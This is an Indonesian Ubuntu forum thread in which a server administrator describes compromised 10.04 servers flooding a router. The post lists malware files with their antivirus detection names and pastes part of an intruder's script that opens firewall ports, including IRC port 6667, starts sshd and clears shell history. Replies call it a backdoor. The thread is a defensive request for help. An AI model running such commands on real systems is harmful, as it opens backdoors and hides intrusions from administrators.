[HELP] Virus @ ubuntu server 10.04 LTS

Diskusi tentang Ubuntu Server baik webserver, database server, samba server dan service lainnya serta jaringan menggunakan Sistem Operasi Ubuntu.
User avatar
ErwinLin
Posts: 3
Joined: 05 Mar 2014, 15:23
Location: Indonesia

[HELP] Virus @ ubuntu server 10.04 LTS

Postby ErwinLin » 06 Mar 2014, 09:03

Halo rekan - rekan user & master - master linux ubuntu.

Ada yang ingin saya tanyakan mengenai hal - hal yang saya dan team saya alami di tempat saya bekerja kemarin.
Di tempat kami bekerja, kami memakai server Supermicro menggunakan OS Linux Ubuntu 10.04 LTS.
Beberapa hari yang lalu, dari salah satu server kami ada aplikasi yang menyebabkan traffic sangat tinggi di router sehingga menyebabkan router tersebut hang (CPU Usage 100%) sehingga jaringan di server kami terganggu.

Kami mencoba untuk mencari asal muasal aplikasi yang menyebabkan traffic tinggi tersebut dan pada saat menggunakan 'top' di OS, kami menemukan ada aplikasi bernama 'talk' yang menggunakan resource sampai 100% di server.
Kami coba melakukan kill & delete terhadap aplikasi tersebut dan semuanya kembali normal.
Beberapa hari kemudian ternyata di server lain ditemukan hal serupa yang mengakibatkan hang kembali pada router.
Hal ini terjadi beberapa kali dan nama aplikasi penyebabnya terkadang ganti menjadi 's'.
kami mencoba mencari root directory aplikasi tersebut dan menemukan berada di folder /etc/.kde
Pada folder ini, banyak sekali file - file dan script yang mencurigakan.
Saat kami coba copy ke laptop yang telah terinstall oleh antivirus 'Avira', file - file tersebut terdeteksi sebagai virus :

filename : f4, detection : LINUX/Flooder.YB
filename : j, detection : DDOS/Linux.Small.b
filename : s, detection : LINUX/Small.D
filename : idiot2, detection : LINUX/Small.D
filename : f, detection : LINUX/Raped.A
filename : x, detection : LINUX/Procfake
filename : idiot3, detection : LINUX/Flooder.YE
filename : stream, detection : LINUX/Flooder.YF
filename : vadim, detection : LINUX/Flooder.YH
filename : bong2, detection : LINUX/Small.E
filename : tty, detection : LINUX/Flooder.YG
filename : bang2, detection : LINUX/Flooder.Y
filename : idiot, detection : LINUX/Verned.1
filename : j2, detection : LINUX/Spoof.H
filename : sl, detection : LINUX.Flooder.YD

selain file2 tersebut, ada file - file lain yang tidak terdeteksi sebagai virus yang berisi script - script untuk setting dan menjalankan aplikasi tertentu menggunakan crontab.
Hal ini terjadi dengan rentang waktu yang bervariasi dan di server yang berbeda2 dari 1 hari sampai 1 minggu.

Saya tidak begitu mengerti secara mendetail mengenai script - script linux tersebut, tapi yang saya tangkap, mereka mencoba membuka sshd di beberapa port yang berbeda dan invite beberapa IP di internet untuk masuk, lalu ada banyak sekali IP proxy dan DNS di salah satu file di folder tersebut.

beberapa sample file - file tersebut bernama : mech.set, mech.session, lalu ada script yang isinya adalah sebagai berikut :
system("/sbin/iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 82 -j ACCEPT ;");
system("/sbin/iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 82 -j ACCEPT ;");
system("/sbin/iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 6667 -j ACCEPT ;");
system("/sbin/iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 6667 -j ACCEPT ;");
system("/sbin/iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 81 -j ACCEPT ;");
system("/sbin/iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 81 -j ACCEPT ;");
system("iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 82 -j ACCEPT ;")
system("iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 1986 -j ACCEPT ;");
system("iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 6667 -j ACCEPT ;");
system("iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 6667 -j ACCEPT ;");
system("iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 81 -j ACCEPT ;");
system("iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 81 -j ACCEPT ;");
system("/etc/init.d/iptables stop; cat /etc/ssh/sshd_config | grep Port ;");
system("/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT; /etc/init.d/sshd start ;");
system("history -c");

Apakah ada dari rekan - rekan yang pernah mengalami hal serupa dan benarkan itu adalah virus di OS linux ubuntu? Atau ada hacker yang masuk dan menyisipkan aplikasi2 dan script2 berbahaya tersebut ?

Terima kasih dan jika ada yang mempunyai info atau bisa membantu, mungkin bisa di share informasi lebih mendetailnya...
User avatar
q_p
Posts: 3109
Joined: 14 Oct 2012, 13:01
Contact:

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby q_p » 06 Mar 2014, 09:10

izin nyimak :)
User avatar
remote
Posts: 50
Joined: 05 Dec 2013, 23:28
Location: Jakarta,indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby remote » 06 Mar 2014, 10:02

blom pernah mengalami tapi mungkin yang lain bisa membantu..
User avatar
oragon
Posts: 65
Joined: 23 Oct 2012, 15:04
Location: Nganjuk,indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby oragon » 06 Mar 2014, 10:33

Jangan-Jangan itu ulah Hacker
User avatar
oragon
Posts: 65
Joined: 23 Oct 2012, 15:04
Location: Nganjuk,indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby oragon » 06 Mar 2014, 10:37

dari script yang ada di filenya kelihatannya itu semacam tulisan untuk memicu suatu command agar bisa merouting atau membuat sebuah port atau backdoor yang bisa dimasuki oleh orang dari luar ,menurut analisaku sih begitu
User avatar
ErwinLin
Posts: 3
Joined: 05 Mar 2014, 15:23
Location: Indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby ErwinLin » 06 Mar 2014, 10:41

[quote=oragon]dari script yang ada di filenya kelihatannya itu semacam tulisan untuk memicu suatu command agar bisa merouting atau membuat sebuah port atau backdoor yang bisa dimasuki oleh orang dari luar ,menurut analisaku sih begitu


hmmm... iya sih waktu memang sempat port SSH di salah satu server dibuka ke Internet untuk keperluan remote tanpa menggunakan VPN dan lumayan lama, tapi setelah itu sudah ditutup kembali, tapi setelah ditutup tersebut, sepertinya file - file tersebut masih bisa berjalan dan menyebabkan hang, padahal port - port SSH tersebut sudah ditutup dari internet. btw, terima kasih atas masukkannya ya...

Apa ada rekan - rekan lainnya yang punya pendapat berbeda?

Terima kasih sebelumnya...